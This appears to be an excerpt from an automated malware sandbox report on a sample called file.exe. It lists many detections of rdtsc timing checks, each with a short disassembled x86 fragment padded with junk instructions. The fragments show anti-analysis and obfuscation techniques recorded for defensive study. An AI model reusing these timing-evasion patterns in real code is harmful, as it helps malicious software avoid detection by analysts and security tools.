Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 9719B4 second address: 9719C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDDACAD5286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe :: RDTSC instruction interceptor: First address: 971AF0 second address: 971B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDDACF47FD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007FDDACF47FD6h 0x00000011 popad 0x00000012 pushad 0x00000013 jl 00007FDDACF47FD6h 0x00000019 jmp 00007FDDACF47FDEh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971AF0 second address: 971B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDDACF47FD6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b js 00007FDDACF47FD6h 0x00000011 popad 0x00000012 pushad 0x00000013 jl 00007FDDACF47FD6h 0x00000019 jmp 00007FDDACF47FDEh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971DAE second address: 971DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 971DB8 second address: 971DC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97208D second address: 972093 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972229 second address: 97223D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FDDACF47FDEh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97223D second address: 972241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723BD second address: 9723C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723C2 second address: 9723C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9723C8 second address: 9723CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97251C second address: 97252A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97252A second address: 97252E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97252E second address: 972534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97267E second address: 972684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972684 second address: 972688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972688 second address: 97268C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B15 second address: 967B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B19 second address: 967B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 967B1D second address: 967B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943F77 second address: 943F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDACF47FE7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727DF second address: 9727FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDDACAD5286h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDDACAD528Ch 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9727FA second address: 972838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDDACF47FD6h 0x00000009 jns 00007FDDACF47FD6h 0x0000000f jnl 00007FDDACF47FD6h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007FDDACF47FE3h 0x0000001c jng 00007FDDACF47FD6h 0x00000022 popad 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a jnp 00007FDDACF47FD6h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972838 second address: 97284D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5291h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972DC1 second address: 972DCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972DCD second address: 972DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9730CC second address: 9730D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9730D0 second address: 9730EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDDACAD5292h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973239 second address: 97324B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FDDACF47FD6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97324B second address: 973251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973251 second address: 973271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FDDACF47FF9h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACF47FE1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973271 second address: 973275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 973275 second address: 973279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97357A second address: 973580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976A41 second address: 976A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007FDDACF47FD6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AE1 second address: 976AEB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AEB second address: 976AFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FDDACF47FE4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 976AFE second address: 976B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C6E3 second address: 97C707 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FDDACF47FE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9474CE second address: 9474D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9474D2 second address: 9474FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDDACF47FDBh 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDDACF47FE6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EEF2 second address: 97EF06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnp 00007FDDACAD5286h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FDDACAD5286h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97EF06 second address: 97EF0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F061 second address: 97F065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F065 second address: 97F070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F070 second address: 97F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FDDACAD5286h 0x0000000d jo 00007FDDACAD5286h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F641 second address: 97F647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F647 second address: 97F64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7BE second address: 97F7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7C6 second address: 97F7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7CC second address: 97F7ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDDACF47FE8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F7ED second address: 97F7F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F94B second address: 97F94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97F94F second address: 97F955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843AE second address: 9843B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDDACF47FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843B8 second address: 9843DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007FDDACAD5291h 0x0000000d jmp 00007FDDACAD528Bh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843DA second address: 9843E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9843E1 second address: 98441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FDDACAD5292h 0x0000000f jne 00007FDDACAD528Ch 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDDACAD528Fh 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98441F second address: 98445A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDDACF47FD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov esi, edi 0x0000000f jmp 00007FDDACF47FE9h 0x00000014 call 00007FDDACF47FD9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FDDACF47FD6h 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98445A second address: 984464 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984464 second address: 984490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jg 00007FDDACF47FD6h 0x00000013 jmp 00007FDDACF47FE3h 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984490 second address: 98449A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDDACAD5286h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850CA second address: 9850D0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850D0 second address: 9850D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850D6 second address: 9850DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9850DA second address: 9850DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98544F second address: 985468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986507 second address: 98650E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98650E second address: 9865B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACF47FDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDDACF47FDBh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FDDACF47FD8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FDDACF47FD8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D2A7Eh] 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FDDACF47FD8h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 00000019h 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 movzx esi, si 0x0000006b movzx esi, dx 0x0000006e xchg eax, ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007FDDACF47FE6h 0x00000076 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9865B9 second address: 9865E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDACAD528Fh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98763A second address: 9876D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDDACF47FE9h 0x0000000e nop 0x0000000f movzx esi, bx 0x00000012 push 00000000h 0x00000014 mov di, FBF2h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FDDACF47FD8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 jmp 00007FDDACF47FE6h 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jmp 00007FDDACF47FE5h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDDACF47FE7h 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E0D second address: 986E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9876D2 second address: 9876D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E12 second address: 986E24 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDACAD5288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9876D6 second address: 9876E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 js 00007FDDACF47FDCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E24 second address: 986E32 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDDACAD5286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E32 second address: 986E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986E36 second address: 986E3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 988298 second address: 98829E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A33E second address: 98A36A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDACAD5299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FDDACAD5298h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FDDACAD5286h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A422 second address: 98A429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A429 second address: 98A449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jmp 00007FDDACAD5292h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98A449 second address: 98A44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EDFC second address: 98EE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FDDACAD5286h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EE0B second address: 98EE64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007FDDACF47FE3h 0x00000010 jmp 00007FDDACF47FDDh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007FDDACF47FD8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 movsx ebx, bx 0x00000034 mov dword ptr [ebp+1244BC60h], eax 0x0000003a push 00000000h 0x0000003c pushad 0x0000003d mov esi, 75A9BDC0h 0x00000042 stc 0x00000043 popad 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 js 00007FDDACF47FD6h 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 992E3E second address: 992E48 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDACAD5292h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98ACF4 second address: 98ACFE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDDACF47FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98ACFE second address: 98AD04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99446A second address: 994470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B74D second address: 98B758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B758 second address: 98B75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EF7D second address: 98EF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99B2B3 second address: 99B2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FDDACF47FD6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C287 second address: 99C291 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
